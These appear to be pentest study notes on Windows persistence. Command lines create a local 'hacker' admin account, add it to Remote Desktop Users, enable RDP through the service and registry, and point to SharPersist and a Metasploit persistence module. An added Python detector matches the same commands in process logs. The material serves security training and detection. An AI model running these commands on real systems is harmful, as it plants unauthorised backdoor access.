FULL CREDIT: https://github.com/s0wr0b1ndef/OSCP-note/blob/master/persistence/persistence_windows.txt
I TAKE NO CREDIT!
# Add Windows user:
net user /add hacker 1234567
# Add user to the Administrators group
net localgroup administrators /add hacker
# Add user to the Remote Desktop Users group
net localgroup "Remote Desktop users" hacker /add
# Start Remote Desktop service
net start TermService
# Is Remote Desktop Service running?
tasklist /svc | findstr /C:TermService
# Permanently enable Terminal Services (older sc.exe versions require the space after "start=")
sc config TermService start= auto
# Enable Terminal Services through the registry (reboot afterwards)
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
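# Detection side (added example, not part of the credited notes): matching the commands above in process-creation logs.
# The rule names, host names and sample events are constructed for illustration.

```python
import re

# Rules are matched against a process command line, e.g. the CommandLine
# field of Sysmon Event ID 1 or Windows Security Event ID 4688.
NET = r'\bnet1?(?:\.exe)?\s+'
ADD = r'(?=.*\s/add\b)'
RULES = [
    ("local_user_created", re.compile(NET + r'user\b' + ADD, re.I)),
    ("added_to_administrators",
     re.compile(NET + r'localgroup\s+"?administrators"?' + ADD, re.I)),
    ("added_to_rdp_users",
     re.compile(NET + r'localgroup\s+"?remote desktop users"?' + ADD, re.I)),
    ("termservice_autostart",
     re.compile(r'\bsc(?:\.exe)?\s+config\s+termservice\b.*\bstart=\s*auto\b', re.I)),
    ("rdp_enabled_in_registry",
     re.compile(r'\breg(?:\.exe)?\s+add\b.*\bfDenyTSConnections\b.*/d\s+0\b', re.I)),
]

def detect(command_line):
    """Return the names of every rule the command line matches."""
    return [name for name, rx in RULES if rx.search(command_line)]

def triage(events):
    """Map host -> rule names hit, in event order; hosts with no hits are omitted."""
    hits = {}
    for host, command_line in events:
        for name in detect(command_line):
            hits.setdefault(host, []).append(name)
    return hits

# Constructed sample events (host, command line); not real telemetry.
TS_KEY = r'"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"'
SAMPLE_EVENTS = [
    ("WS01", "net user /add hacker 1234567"),
    ("WS01", "net localgroup administrators /add hacker"),
    ("WS01", 'net localgroup "Remote Desktop users" hacker /add'),
    ("WS01", "sc config TermService start= auto"),
    ("WS01", "reg add " + TS_KEY + " /v fDenyTSConnections /t REG_DWORD /d 0 /f"),
    ("WS02", "net user"),              # listing accounts only
    ("WS02", "sc query TermService"),  # status query only
    ("WS02", "reg add " + TS_KEY + " /v fDenyTSConnections /t REG_DWORD /d 1 /f"),
]

if __name__ == "__main__":
    for host, names in triage(SAMPLE_EVENTS).items():
        print(host, names)
```

# Several of these rules firing on one host in a short window is a stronger signal than any single hit.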
# SharPersist
https://github.com/fireeye/SharPersist
# Metasploit module for in-memory persistence
# In Metasploit:
use exploit/windows/local/registry_persistence
set session <SESSION NO>
run